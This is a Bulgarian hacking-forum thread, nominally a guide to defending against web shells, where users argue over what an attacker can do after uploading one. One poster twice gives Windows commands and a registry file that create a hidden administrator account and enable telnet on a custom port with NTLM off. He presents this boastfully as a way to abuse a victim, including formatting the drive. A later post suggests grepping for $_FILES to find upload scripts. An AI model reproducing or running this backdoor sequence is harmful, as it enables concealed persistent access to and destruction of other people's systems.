[Guide] Кой е лесният и сигурен начин да се защитим от Shell

Ауу големи всезнайковци се навъдиха тука (nqh)
Какво ще направиш с тоя shell като user-a няма право да edit,move,delete,raname,upload,download?
Гледай и се учи :)
Code:
net user xakep wwc /add
net localgroup administrator xakep /add
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"xakep"=dword:00000000
Тоест правим нов юзрър,със регистъра го правим невидим,пускаме телнет и Shit on The Victim.
http://windows.microsoft.com/bg-BG/windows-vista/Telnet-commands
 
hxuauhxuhauhxhuaxuhahuxuhauhxuhauhxhuauhxahuxa
големи хакери ще си саздаде нов акаунт алабала ... аре вари хакни zamunda по същия начин ...
на теория много ви знай остата
а на практика .. |-(
 
Гледай и се учи :)
Code:
net user xakep wwc /add
net localgroup administrator xakep /add
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"xakep"=dword:00000000
Тоест правим нов юзрър,със регистъра го правим невидим,пускаме телнет и Shit on The Victim.
http://windows.microsoft.com/bg-BG/windows-vista/Telnet-commands


Казваш че ще си създадеш нов акаунт, но какво ще бутнеш с него, след като apache е пуснато със акаунт който няма права :)
 
  • Like
Reactions: y0caa
Казваш че ще си създадеш нов акаунт, но какво ще бутнеш с него, след като apache е пуснато със акаунт който няма права :)

Точно ... ;]
 
Казваш че ще си създадеш нов акаунт, но какво ще бутнеш с него, след като apache е пуснато със акаунт който няма права :)

Телнет ?,със него влизам и акаунта със пълни права и аре.Format C:\ :)
Най добрата защита е да се напише скрипт който проверява директориите за shell функции (upload най вече :) )
#############
hxuauhxuhauhxhuaxuhahuxuhauhxuhauhxhuauhxahuxa
големи хакери ще си саздаде нов акаунт алабала ... аре вари хакни zamunda по същия начин ...
на теория много ви знай остата
а на практика .. |-(
Ако не можеш да помогнеш в тази тема, като кажеш нещо смислено просто си затвори човката :) .
Ако имах достъп до замунда,да е заминал вече :)
 
Last edited:
най-лесният начин е търсиш уеба или си го пишеш сам :D , кат не разбираш на риск...
 
Телнет ?,със него влизам и акаунта със пълни права и аре.Format C:\ :)
Най добрата защита е да се напише скрипт който проверява директориите за shell функции (upload най вече :) )

Според тебе моя телнет сервиз автоматик или дисабле е ? :D а и ако е пускат с самия телнет нямаш фаида поради причината че телнета ти е ограничн защотото си с потребител с лимит а не админ (mm)
 
Според тебе моя телнет сервиз автоматик или дисабле е ? :D а и ако е пускат с самия телнет нямаш фаида поради причината че телнета ти е ограничн защотото си с потребител с лимит а не админ (mm)

Добре де,защо по дяволите правя нов акаунт ?За парти на акаунти ли ?За състезания на кой има най много права акаунт ?Правя го за да мога да се свържа директно с него,а не с limited акаунт.Иначе каква файда ми е да го крия ала бала.
#########
най-лесният начин е търсиш уеба или си го пишеш сам :D , кат не разбираш на риск...
Най умния отговор за целия ми живот :)
 
Добре де,защо по дяволите правя нов акаунт ?За парти на акаунти ли ?За състезания на кой има най много права акаунт ?Правя го за да мога да се свържа директно с него,а не с limited акаунт.Иначе каква файда ми е да го крия ала бала.
#########

И го праиш на ХП най- вероятно :bleh:
 
Ауу големи всезнайковци се навъдиха тука (nqh)
Какво ще направиш с тоя shell като user-a няма право да edit,move,delete,raname,upload,download?
Моето момче, ще кажа на теб каквото казах и на колежките ти. Нямаш достатъчно голям набор от знания за да излежеш на глава с мен.
Правата на apache usera са без никакво значение, тъй като "апаче" не бута нищо. То само execute-ва заявката за SQL, който вече я обработва. Следователно правата на апачето нямат никакво влияние. А иначе ти нямам как да ми качиш скрипт до компютъра..да почнем от там..
Ами мислете бе.
 
Да почнем от това че поне аз post-вам нещо което сам си измислих а не script който съм видял в уеб уроци :)
 
Моето момче, ще кажа на теб каквото казах и на колежките ти. Нямаш достатъчно голям набор от знания за да излежеш на глава с мен.
Правата на apache usera са без никакво значение, тъй като "апаче" не бута нищо. То само execute-ва заявката за SQL, който вече я обработва. Следователно правата на апачето нямат никакво влияние. А иначе ти нямам как да ми качиш скрипт до компютъра..да почнем от там..
Ами мислете бе.


Може да се качи ако нети е настроено ini.php има бая опции от които даже мога да се ползва и remote include (ремоте шелл) xD. През Sock също може да се качи..
Качи 1 шел в някои php хостинг(статилен като superhosting.bg) и виж че може да ползваш опциите на шела само в твоята директория ...
Не ми отговаряй ама те са на линикс защото както линукс може да прави лимити на папки и финкции така и windows server може.
 
Най умния отговор за целия ми живот :)

Търсите за:

$_FILES и трябва да намерите нещо подобно $_FILES[blqblq];

където го видите тва отваряте файла сърчвате и готово,
ето и линк към дреам:
http://zamunda.net/details.php?id=145388&hit=1

Приятно чистене от Шелове или Ъплоад файлове.
Бати тапото го правите... супер просто е(chuckle)(chuckle)(chuckle)
 
Търсите за:

$_FILES и трябва да намерите нещо подобно $_FILES[blqblq];

където го видите тва отваряте файла сърчвате и готово,
ето и линк към дреам:
http://zamunda.net/details.php?id=145388&hit=1

Приятно чистене от Шелове или Ъплоад файлове.
Бати тапото го правите... супер просто е(chuckle)(chuckle)(chuckle)

:D (rofl) това не върши работа ако няма <form method="post" enctype="multipart/form-data">.
+ Функцията е за ъплоад и тва е 1 параметър а има доста http://php.net/manual/en/features.file-upload.php
ето от РНР.НЕТ
 
ако съм 24/7 на пц и проверявам всяка секунда с дреамчето върши раота ама докато ям еба или бия ми качат шел ще ме окрадат и хакнат 100 пъти :D
 
Може да се качи ако нети е настроено ini.php има бая опции от които даже мога да се ползва и remote include (ремоте шелл) xD. През Sock също може да се качи..
Качи 1 шел в някои php хостинг(статилен като superhosting.bg) и виж че може да ползваш опциите на шела само в твоята директория ...
Не ми отговаряй ама те са на линикс защото както линукс може да прави лимити на папки и финкции така и windows server може.
Не, не можеш.
Каква балама трябва да си за да сложиш скрипт, писан от другиго, който не си проверил в ht руута на сървъра си.
Remote скриптове са забранени на абсолютно всеки пак и репак по подразбиране в php.ini ...

@niker.. има далеч по услиожнени начини да представиш такъв код.. и вече съм го написал..ако си на зор търси из постовете ми.
 
Не, не можеш.
Каква балама трябва да си за да сложиш скрипт, писан от другиго, който не си проверил в ht руута на сървъра си.
Remote скриптове са забранени на абсолютно всеки пак и репак по подразбиране в php.ini ...

@niker.. има далеч по услиожнени начини да представиш такъв код.. и вече съм го написал..ако си на зор търси из постовете ми.

А fopen, upload изключени ли са кат инсталираш xampp ili appserv ????
 
Last edited:
A fopen, upload zabraneni li sa kato installne6 xampp ili appserv ????

PS. Izvinqvam se 4e pi6a taka no nes1m na moq pc kato se pribera 6te go redaktiram na kirilica.
..и отново казвам... нямам как да качиш скрипт с твой код на сървъра ми като начало..
 
Виждам колко разбираш... няма какво да ти
обяснявам нито да пиша повече в тази тема.
 
А fopen, upload изключени ли са кат инсталираш xampp ili appserv ????
а sms системата дали ще работи без fopen? (nqh)
- не